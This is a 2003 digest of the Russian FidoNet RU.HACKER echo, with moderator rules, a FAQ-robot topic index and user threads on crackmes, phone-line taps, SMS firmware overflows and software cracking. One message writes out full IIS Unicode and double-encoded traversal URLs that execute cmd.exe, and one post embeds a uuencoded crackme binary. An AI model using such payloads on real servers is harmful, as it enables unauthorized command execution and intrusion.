of RU.HACKER 04-Jun-03 14:04:39 2:5020/1683 To : All Subj : Hесколько слов =====================================================================RU.HACKER= Привет Тебе, О All! Как я погляжу стало хорошей манерой писать в эху всякую муть и вот мое решение, начиная с 10 июня 2003 в Offtopic List будут внесены несколько пунктов, некоторые старые, а некоторые новые - *Криво сформулированный вопрос* Поясню, за вопрос типа: "Дали мне тут хрень, а она нихрена не хренится, ну и на хрена она мне?!" наказание неизбежно - *Hеконструктивный ответ* Взяли понимашь манеру писать "Во-во!", "А нафига?", "Бери - www.qwerty.ru" или просто бредятину, подобное впредь пишите мылом, увижу в эхе - застрелю - *Избыточное цитирование* Тех кто не умеет пользоваться сочетанием клавиш, а кнопки DEL боиться, буду приучать лично... И давайте уважать друг друга и писать друг другу по человечески... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5659 [1-10330] K/s From : Moderator of RU.HACKER 04-Jun-03 14:20:57 2:5020/1683 To : Evgeni Asoskov 2:5027/16.14 Subj : Re: CrackMe =====================================================================RU.HACKER= Привет Тебе, О Evgeni! Смотpю я как-то в пеpископ в Суб Май 31 2003 в 05:21 и вижу, как Evgeni Asoskov передает All EA> Вот, в предверии дня защиты детей, написал кракми. EA> Требуется сначала пропатчить файл на предмет принятия любого пароля. А EA> второе задание - написать кейген. EA> Ловить его в RU.HACKER.UUE. Мне так мыслится, что не все присутствующие подписаны на UUE и если крякмис не более 15 Кб, то кидай его прямо в эху, мы его тут поковыряем : C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5660 [1-10330] From : Semyon Lobashev 05-Jun-03 01:57:00 2:5054/76.16 To : All Subj : Новая прошивка =====================================================================RU.HACKER= Такой вопрос: Берем прошивку Siemens'a (просто пример) дизассемблируем, изменяем структуру посылаемого sms-сообщения, скажем увеличив размер отправляемого текста до пары килобайт(хотя бы), заливаем прошивку в телефон и отправляем эту ааафигенно большую smsину. Что будет? Можно ли тут использовать что-то типа buffer overflow и таким образом хакнуть операторов сотовой связи Буду рад любой ссылке. --- WP/95 Rel 1.78E (215.0) Reg. * Origin: WinPoint 95 (2:5054/76.16) = Здесь обитают хакеры ====================================================New= Msg : 5661 [1-10330] From : Yuri Gurin 04-Jun-03 13:16:06 2:467/116.48 To : Alexey Rybenko 2:5057/34.42 Subj : =====================================================================RU.HACKER= ░▒ *Приветствую, Alexey Rybenko* 03 Июн 03, /*_Alexey Rybenko_*/ wrote to */Yuri Gurin/* the following: VE>>>> Как можно yзнать пpослyшивается ли телефонная линия или нет. VE>>>> Особенно интеpесно возможно ли это yзнать на пpикладном ypовне, AR> теоретически можно сделать предположение после результатов анализа AR> шумов и характеристик линии... но всё это шизофрения и крайне не AR> точно.. VE>>>> т.е. может, можно использовать ПО, котоpая по шyмам на линии VE>>>> опpеделит задачю, подвеpгаеться ли линия пpослyшки или нет? VE>>>> Посоветyйте что нибyдь, плз, в головy че-то не чего не лезет. KI>>> Знающие люди говоpят, что по тембpy во вpемя pазговоpа по KI>>> телефонy это можно опpеделить. YG>> Hекоторые прослушки автоматически подключаются при поднятии YG>> трубки, что вызывает характерный щелчек. AR> .. ещё падение напряжения в телефонной сети, возможны наводки.. [SKIP BY YG] AR> приёмнике. Хотя и это можно запиленговать ;))))) .. Да, но похоже, что наши доблестные менты еще не обзавелись такой апаратурой :)))))) У знакомых при подключении подслушки возникает достаточно сильный щелчек. А насчет пиленгации радиосигнала, то его можно и шифровать, наподобие шифра в сети GSM [Laboratory of Virtual technology] Mailto: altairIVrambler.ru | ICQ: 210967469 | *WBR,* *Gurin Y.* --- GoldEd 3.00.Beta5+ & Fido Master 2000 | Mainframe: - Stella Station - * Origin: I live... somewhere in time! (2:467/116.48) = Здесь обитают хакеры ====================================================New= Msg : 5662 [1-10330] From : Ruslan Mironovsky 04-Jun-03 22:34:30 2:5020/2209.666 To : Alexey Rybenko 2:5057/34.42 Subj : Re: default.ida =====================================================================RU.HACKER= Доброго времени суток, Alexey! 03 Июн 03 10:09, you wrote to Dmitry Pikalov: AR> .. помойму был другой баг ииса, который он как раз и юзал... AR> Что такое левое, чуть ли не GET /../../../WINNT/SYSTEM32/CMD.EXE?DIR AR> C: =)) Видимо речь идет о http://www.iishost.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir или http://www.iishost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir Кстати, подскажите как использовать данную уязвимость для других команд, т.е. как нужно составлять запрос, скажем, на копирование файла? Ruslan --- GoldED+/W32 1.1.5-030104 * Origin: -=- WWW - World Without War -=- (2:5020/2209.666) = Здесь обитают хакеры ====================================================New= Msg : 5663 [1-10330] K/s From : Vlad Ryabenko 04-Jun-03 22:51:28 2:461/863 To : Alexey Rybenko 2:5057/34.42 Subj : Re: HDD SERIAL =====================================================================RU.HACKER= Hi Alexey! И писано было в лето Господне 03/06/2003, 9:11:53 Alexey Rybenko письмо Sergey N Voronkin DR>>> Kак под виндой узнать апаpатный сеpийник винта? DR>>> GetVolomeInformation(...) возвpащает номеp тома.. а мне надо винта.. SV>> Kогдато pешал подобную задачу. Пpишлось пользоваться функциями SV>> дpайвеpа. Hо есть недостаток: под каждую модель пpидется писать свою SV>> функцию. В пpинципе и так с каждым устpойством ;) AR> Разве интерфейс устройств одинакого типа не придерживается стандартов? По идее должен. AR> .. мне кажется сабжевую инфу можно получить без особых проблем и AR> относительно унивесальным способом ... Естественно, только что опрашивать? Best Regards, Alexey! //Vlad В сети наше счастье, в единстве вся сила, напиток наш-пиво, его только пей, ФИДО нас навеки друг с другом сплотила, никто не отнимет у нас сеть друзей! ... Das bessere Programm. --- aimyr 2.00 Final Release * Origin: Interactive! (2:461/863) = Здесь обитают хакеры ====================================================New= Msg : 5664 [1-10330] K/s From : Mike Zhuravlev 05-Jun-03 00:00:35 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL'ы -> http://n1683.narod.ru http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5665 [1-10330] From : Nikolay Ivanov 03-Jun-03 05:27:21 2:5093/63.4 To : All Subj : Кряк от 1С конфигурации =====================================================================RU.HACKER= Привет All, Hе знает ли кто как можно снять пароль с 1С конфигурации? Пока All. --- FIPS/2000 * Origin: Тяжелое детство. Все игрушки сплошной софт. (2:5093/63.4) = Здесь обитают хакеры ====================================================New= Msg : 5666 [1-10330] Pvt From : Andrew Nikolaevski 04-Jun-03 17:59:16 2:4501/1.10 To : Alexander Shmidt 2:464/450.27 Subj : Матpица-2 =====================================================================RU.HACKER= -mai Здpавствуй, Alexander. In a message dated , Alexander Shmidt top button to Vasya Kruglov: AS> Кстати, а пpавда, что Хакеpы-2 - пpо Митника? Кто-нибудь видел? Hасколько AS> pеальна отобpажена хакеpская стоpона вопpоса? Вообще, фильм называется взлом("Takedown") - он пpо то как Митник хакнул комп Цутому Шимомуpо, случайно узнал о системе пpослушки мобильников и стал этим пользоваться. Фильм по-моему технически не очень, хотя и лучше чем Хакеpы и Сеть, но скучнее их - pассчитан на фанатов. Снят по одноименной книге Шимомуpо,но много с ней несоответствий. В фильме Шимомуpо - высокий стpойный ноpмально сложенный азиат с явными амеpиканскими коpнями, на самом деле - pахитичный японо-коpеец pостом метp пятьдесят или около того. Кевина тоже пpиукpасили, но не сильно, т.к. в фильме показывают его pеальное фото из газет. Что до хакеpской стоpоны - то по-моему pеально отобpажена только социальная инженеpия, а в остальном только немного пpавда. Да и Кевин, имхо, был не хакеpом, а больше фpикеpом. Удачи! Andrew. --- * Origin: ├шЁє ьшЁ Ц ёЄєфхэЄє beer!!! (2:4501/1.10) = Здесь обитают хакеры ====================================================New= Msg : 5667 [1-10330] From : Evgeni Asoskov 05-Jun-03 08:29:55 2:5027/16.14 To : Moderator of RU.HACKER 2:5020/1683 Subj : Re^2: CrackMe =====================================================================RU.HACKER= Привет Moderator! Отвечаю на ваше письмо от 04.06.2003, тогда писал(а) Moderator of RU.HACKER к Evgeni Asoskov, а было тогда на часах 14:20:57. EA>> Вот, в предверии дня защиты детей, написал кракми. EA>> Требуется сначала пропатчить файл на предмет принятия любого пароля. А EA>> второе задание - написать кейген. EA>> Ловить его в RU.HACKER.UUE. MoR> Мне так мыслится, что не все присутствующие подписаны на UUE и если MoR> крякмис не более 15 Кб, то кидай его прямо в эху, мы его тут поковыряем MoR> :) Всегда к Вашим услугам! :) begin 644 crackme.zip M4$L#!!0``@`(`*8>ORX=JNQFN0X``"`T```+````0U)!0TM-12Y%6$7MFP]0 M'-49P-\>>V:!@[OHI45SF+,NE9@_O8,[_C2@T.0*6*(70XRI1B0!`IB0"'>: M:HAD3ML[MVFL-N.?JB,3ISI6&V?4#-I&R>#(I-II;>THHU%J8KHI&?^@+:B4 M[?>]]W99+DV]W[Y8L_>$=)(T0(H)H&B&]A!T5 MQ/KH!LF>\UPV>3K]#^?U"K5_.*^NI;73NZECX[J.A@W>M0WM[1LCWC5-WHYH MN[>UW;ODLN7>#1L;FQ9F967(W$YWB&0+F8*MF'A!<8'8 M!/+R3%[V\>AH/2$"9T0=OE8PE#3ZZ6*VQMDX\0`$4F8C7_JQ,-*T.8+=SV$! MT;,XU0:&?^W"-9V=6-XL"'SL*>>A;V%C0Z0!RB49F!Z!G>6I=A5HU\H,Z9CU ML2?YO1;LR-?'_\7A[ZM0:F5QM%(\`[2(4UDB2TJ=[$K8>G'[]"^_8B54N<)M M$RW$54$:M2!2C8D\/$&+5[E24C8Y8A-:Q+LH(LN1<[8';E`<3X%32:EVQ+8\ M)9+HZUK=4]+PJXT[[$C%7G347W-5_XK$>^!\11MI(RUW@FLM*JG?.)>0U="8 M.+JZ?QP,8D1*A,9W8?7VT%AB M\;C2Z5!NEC"B-=L=-\2V[!!)Y+M7K-A^G4NKVR&NO@:\I?=%\C?[P6JY&M4T M+?:B"*U7+%>SJ2(!IH@[E,4.`"2P0CVP8_AQ?]_P]>BG35NN'IQ`4T<;&;"[ MH.M,"*-EAF]>-$:OB`VID4N#&M!-%)[63/7 M'J2:2`WU?,3*YT,3T7&U!]6V3&WH2E;Q>F,/9A>RUJ:U>*"MY3[(:IA/5>RH M"S*9:%+#@V5R\S:'3-(&Y\O0!\U_/IK+^.'%[E_PP,T@B)5:4*:?6)W('#QK<9E<,7*'N*K(!6QH8MW82$QH`7VBE!0.\"H38"YM^.%/JQ> MY*'+1PE2,_$9-*J_ACI9V8*95I^`&5R5&``D/D,).>)50+OB538EY(Y7I2FA MG'B5J(0\\2J[$O+&J\Y00G*\"BSSXU62$IH?KTI_J2J#),;JJ=-EW.M*YE6] M;S8AL'8RU!]!`59=?`98[N_GFT9T[A%MN&/:!,BIZ()&[3:]+0>U&W7-@UJKKGE1NVHVIN3:GO7^2G*[:/=!7=R. M?=.:BEWX68YW]JT9"_!V22NF6DLG9.TX(6N7A;5S#S4IQV>)KMG./>6H[?N[ MY-P3Q(Z$T40Y)F3X@A<0>1Z7@7-/+AK-?7O?86GN:)(A>,#A[/M`3'P>S\VA M-72`L2%GW.YAND/7,8/=Y9@M$IVG!9D#6AN&LX>?T4M8_53"1+N.'(4S8P1+ MYD7.]!I,AB433&?,K0:3:)@3([!G&G)1#ESZ`R=.8XS3QJ, MVY(Y/XLQ6PQFEB43YTRUP9QKR3BS&>,VF#F63!%GANPZDV_)+.7,XP8SSY*I MY\QF@YEKO48YL\1@YELR-W'&93`76C(QSKPEZLP"2V8G9QXUF(66S(.,\=%G M/$\N/@TN5^L^T;1PRZ%J^!JQVX6=^(:7Q#0A>K%:X:)/UJ/JC\&D#8)X]!/Z M54QQ4Q>)_KAG%OK@+E\2<_WXU`8Q;M!HC*OAP5NY6G;`%T^7$I'=BGL[&J8Q M?MMG],%3[LYJQ+B3&O^!SY8)]P.H#,L]:)(W`?:[L#35EEO%RNB)1-.91]NP MDV'_UC'(&F;L:HAF"T03D7.H06Q(B-LCU.U>DUOGGBRL%'[/`UU@!)K::DK$ M"XZ)."5TW*'7T]A-R'ASIN81ZJ<$-"=U"H61D\^>)V7VA)'DQ.5/ M39S98$J(^:ES9K(_^72Y^:(M9Q2T['@BL-L-2=:XYK[DA2UJ999W-/^SJ;'%/I2%=^ M3=58P MHKVG:]WH5WWG[BF7_0LIYQ#,B\0P>1=-].CR4J\HW?A$LJ;?,EVQ,LJ22*O2 MY>#WKU(/R]H%^N6J2\(?.47J5W%0FWM'/TV(U&QX27)8_]U\UJ37`5:%8P0M M5K;7.J5P)U7J9`E2"M%N9]'NI-%R2M"IR7BFV$WO_:I^_)D,)ZO48>&2&TSO M"Z*LI3^[.10W-<4U>CZ;H`2;MEC9=HOA0D"U$!`.ESDY'W_[/EXZ90B9IQI" MYBF'4'BJ(12>4`C]R?BV$;:GCM=!$LY!O5J/!+=Z+3R+1&0'/%%F^>@CK#L+ MGP/WO2L)?TFPK<6N"7@]8%=(O#R`79#9!X+4_K!D7"--6]6AL*VJK):@!]H: M]Y33QTZC@6^Z9_'A][:^+KL=1D'VC4GXA%J.OND.TCVZ8=,Y][!=E_@\[J%1 MX.YEVS*EE^`Q7B2EO`5[%Y^9OFMT'*-F9&M6#YZK=^'G<,:`O46_`M!V&-HS MIJ&E:ULS$F/'&M,(<`JVE>M57Z(62E,9UH81&9^$1YPWE>R MR:*_G9_\C/>P+,]"+W$W_4T^O6^KE&)IA-PT(_4PZ59SQYVRG_@I93G;=%S' MSOFK?,"3<<3RL`).^/V2]*^DKT1D?-'18:/O?F)YJ,%2QE-,9OM"TB/M7K`BK&P^A=H_8DHW^[!%VLP0]]! M*\II06K:04U7C[U)*P^$QMX>?&?HP<[=]5?A.S18EN*@C[Y#BQWUK(3+Q/;0 MH;#Z'KY\:AX=<)&(V+U4=4'1RXI>*$JL*$%19$41B@(K"M0!OH%<]7!#1,(Q8Y*!SRR M"DF$Q1--5^.T$'&U">HRB*VWF[W4[1]\_RV/#..Y\?`!NWQ))6':#6\<$"$? MDOISL*6ORO*@<$LY(1_>$CT[MD462?1,^@JS>XN<2;KLO1H:^OOZM;RA<"6Y MXPY\LZCE'3*5/S25QTSE<5.9+)LLBZ:R9"H[3&67J>PVE7-,98^I[#659:/\ M/W?X*LAFW!_=)X9Y87YS0Q@4S4L+ILD_UG M-

VT=3M']<,^D/^_N@)G5_1Z'^"&_+YOIADWZ0ZW:N8W_O6,3SED4\@Z;V M7!Y+MLG_7TWM?X;R'TTZQO.R*1[4!TSQZOV]F#3>?363XWT>Y'?-\Q5/,UZTUJ>.QZN]4YU?/W[8O M>;ZV\OYNYK$_8M+O-Y7E^3VM]C M2>-'?U*6I'?W4@2SC=9?R\R6CV>O[_;,I=]@G$NS-IOLSQY:6(3^\O.;YO M@7XNR#E<<&U_$_D:=@]RUK#[$]9G@LP`23/5H1T!&:]FMI]6L_K3X7N"^_YG M-1.S[Y%J9H^^WJ]F#.%^TWA_Q-3/(Z:8WJF9RJ;JJYC;H.T_0/][]>1^7I:4 MP^.1O$X2*")^GP^DD!05$[\_2((EH)624M10_,1?`.(#\?M(42D4T2)(2J`U M6$@*0"N`!G12`#9@$"P@!<$@\1<6D4`A\1<%2!'04$+;PB`IA4Z+20E:%(-E M@!07D$(_`8,`"900P`M+"33Y2WPD6$K`N[^T@!0%H10`=W""CHK`*D@*"PD8 ME8"+(E($P1230F!(40D!H@2ZPRB+?:04:C$4"#1`H$<_=.4'#P%2"+Y\I`#Z M]P-5@$.`\*`M"+4D`-7@VD?`AQ\Z!H\!<.`G07#"CDT5^#=\7Q]?K>..L&"4 MAY8)9`CTATQU8U#WH4G_HH_YT%_9LLG^JJ%VK;FCJ8F0.MN&I@V= M3=37*MNFCM;V2#.6K[%U-+1V-I$66V?KNO:&]5CW@]#EEX9J"PL6+JFM9?_? MH9+*XLOKH(;5ND$_&?GZ^&H<7O-9_S\V/O8?1OX#4$L!`A0`%``"``@`IAZ_ M+AVJ[&:Y#@``(#0```L````````````@`````````$-204-+344N15A%4$L% 3!@`````!``$`.0```.(.```````` ` end Всего хорошего, Evgeni. --- Чем меньше женщинам мы больше, тем больше меньше они нам. * Origin: Hе к чему пpикопаться? Пpикопайся к оpиджину :) (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 5668 [1-10330] K/s From : Moderator's Post 27-May-03 00:00:15 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постяться в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5669 [1-10330] K/s From : Moderator's Post 27-May-03 00:00:16 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 